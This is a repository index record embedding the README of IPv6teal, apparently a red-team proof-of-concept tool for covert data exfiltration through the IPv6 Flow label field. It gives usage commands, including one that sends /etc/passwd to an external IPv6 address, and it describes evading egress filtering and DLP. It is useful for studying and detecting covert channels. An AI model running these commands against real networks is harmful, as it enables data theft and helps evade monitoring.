{"id":17194936,"url":"https://github.com/christophetd/ipv6teal","last_synced_at":"2026-03-27T02:41:48.322Z","repository":{"id":144732080,"uuid":"198652870","full_name":"christophetd/IPv6teal","owner":"christophetd","description":":wave: Stealthy data exfiltration via IPv6 covert channel","archived":false,"fork":false,"pushed_at":"2019-07-26T14:25:22.000Z","size":6,"stargazers_count":102,"open_issues_count":1,"forks_count":19,"subscribers_count":6,"default_branch":"master","last_synced_at":"2025-07-06T13:47:27.834Z","etag":null,"topics":["covert-channel","exfiltration","ipv6","red-teaming"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/christophetd.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2019-07-24T14:33:51.000Z","updated_at":"2025-06-19T08:01:53.000Z","dependencies_parsed_at":null,"dependency_job_id":"00e90885-8337-4114-a0af-a5e25354cfa3","html_url":"https://github.com/christophetd/IPv6teal","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/christophetd/IPv6teal","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/christophetd%2FIPv6teal","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/christophetd%2FIPv6teal/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/christophetd%2FIPv6teal/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/christophetd%2FIPv6teal/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/christophetd","download_url":"https://codeload.github.com/christophetd/IPv6teal/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/christophetd%2FIPv6teal/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31011445,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-27T02:33:22.146Z","status":"ssl_error","status_checked_at":"2026-03-27T02:33:21.763Z","response_time":164,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["covert-channel","exfiltration","ipv6","red-teaming"],"created_at":"2024-10-15T01:48:39.878Z","updated_at":"2026-03-27T02:41:48.313Z","avatar_url":"https://github.com/christophetd.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# IPv6teal\n\nIPv6teal is a Python 3 tool to stealthily exfiltrate data from an internal network using a [covert channel](https://en.wikipedia.org/wiki/Covert_channel) \nbuilt on top of the IPv6 header `Flow label` field.\n\nIt is made of 2 components:\n\n- **[exfiltrate.py](./exfiltrate.py)**: Client-side component, used to exfiltrate data from an internal machine\n- **[receive.py](./receive.py)**: Server-side component, used to received the exfiltrated data\n\nJump to: [Background](#Background) | [Usage](#Usage) | [F.A.Q.](#FAQ)\n\n## Background\n\nIPv6 packets have a [header](https://en.wikipedia.org/wiki/IPv6_packet#Fixed_header) containing a 20-bit field, `Flow label`.\n\n![IPv6 header](https://user-images.githubusercontent.com/136675/61957346-9b870c00-afae-11e9-9ac3-4b2c0e0dedb7.png)\n\n\u003e **Flow label**: Originally created for giving real-time applications special service.\n\u003e When set to a non-zero value, it serves as a hint to routers and switches with multiple outbound paths \n\u003e that these packets should stay on the same path, so that they will not be reordered.\n\u003e\n\u003e (Wikipedia)\n\nThis field can be set to an arbitrary value without impacting how the packet will be delivered to its destination.\n\nTherefore, we can build a covert channel by storing data to exfiltrate in this field. The exfiltration script sends 1 \nIPv6 packet per 20-bits of data, and the receiver script reconstructs the data by reading this field. The payload of every\nIPv6 packet send contains a magic value, along with a sequence number, so the receiving end can determine _which_ IPv6 packets\nare relevant for it to decode.\n\n\n## Usage\n\nBasic requirements:\n\n- Both the client (where lies the data to exfiltrate) and the server (where the data should be exfiltrated) \nneed to support IPv6 and to have an IPv6 address. For my tests, I used a $5/month DigitalOcean droplet.\n\n- Both the client and the server need to have scapy installed (`pip install scapy==2.4.2`)\n\n- Python 3\n\n### Server\n\nOn the machine to which you wish to exfiltrate data, run `receive.py` as root.\n\n```bash\n$ python3 receive.py hashes\n\n[-] Started receiver\n```\n### Client\n\nOn the machine where you wish to exfiltrate data, run `exfiltrate.py` as root.\n\n```bash\n$ python3 exfiltrate.py --help\n\nusage: exfiltrate.py [-h] [--packet-sending-interval-ms SENDING_INTERVAL]\n input_file destination\n\npositional arguments:\n input_file File to exfiltrate\n destination IPv6 address where to exfiltrate data\n\noptional arguments:\n -h, --help show this help message and exit\n --packet-sending-interval-ms SENDING_INTERVAL\n Number of milliseconds to wait between each IPv6\n packet to send (default: 10)\n\n```\n\nSample use:\n\n```\n$ python3 exfiltrate.py /etc/passwd 2a03:b0c0:3:d0::cee:8001 \n \nSending 560 bytes (4480 bits) in 225 IPv6 packets... \n \n.................................................. \n.................................................. \n.................................................. \n.................................................. \n........................ \n \ndone \n```\n\n\n\n## F.A.Q.\n\n### Couldn't we directly store the data in an ICMPv6 echo-request packet or in the payload of an IPv6 packet itself?\n\nWe definitely could. However this PoC was built for the (fictional) scenario of an enterprise network which would \nhave strict egress network filtering such as ICMPv6 being blocked from the internal user network to the Internet, \nand/or where a DLP would be analyzing the payloads of IPv6/ICMPv6 packets.\n\nEven in this case, it is unlikely that all outgoing IPv6 communications would be blocked and would therefore still\nallow for data exfiltration using this technique. \n\n### If it fast?\n\nAlthough the data being sent is compressed using GZIP, it's terribly slow. \nEach IPv6 packet sent over the network contains 20 _bits_ of data (that's two and a half ASCII characters).\n\nDuring my tests I managed to transfer a 1.2 MB file of uncompressed random data in 30 minutes\nacross 2 machines of different DigitalOcean regions (Amsterdam and Frankfurt).\n\n### Is it reliable?\n\nAbsolutely not. Any IPv6 packet dropped will make the transmission fail. I intentionally did not want to \nmake the tool reliable to keep it simple and avoid reimplementing a TCP-like pseudo network stack.\n\nHowever, it does handle out-of-order IPv6 packets.\n\n### Is the transmission encrypted?\n\nNo. If you are transmitting sensitive data, it's a good idea to encrypt the data on the client side before feeding it to\nthe exfiltration script.\n\n### Can it handle large files?\n\nProbably not. Maybe. In any case it will be slow.\n\n### Why do the scripts need to run as root?\n\nBecause they craft raw IPv6 packets. If this is a problem, you can give the `cap_net_raw` capability to a \nnon-superuser and have it run the scripts.\n\n### Some packets are getting lost, what can I do?\n\nTry to increase the value of the `--packet-sending-interval-ms` argument of the exfiltration script. \nIt is 10 milliseconds by default, meaning that the programs waits 10ms before sending every new packet.\n \n## About\n\nOriginal idea from the paper _[Covert Channels in IPv6](https://link.springer.com/chapter/10.1007/11767831_10)_ by Norka B. Lucena, Grzegorz Lewandowski \nand Steve J. Chapin from Syracuse University.\n\nFor any question or bug report, feel free to [open an issue](https://github.com/christophetd/ipv6teal/issues/new) \nor to tweet [@christophetd](https://twitter.com/christophetd). ","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchristophetd%2Fipv6teal","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchristophetd%2Fipv6teal","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchristophetd%2Fipv6teal/lists"}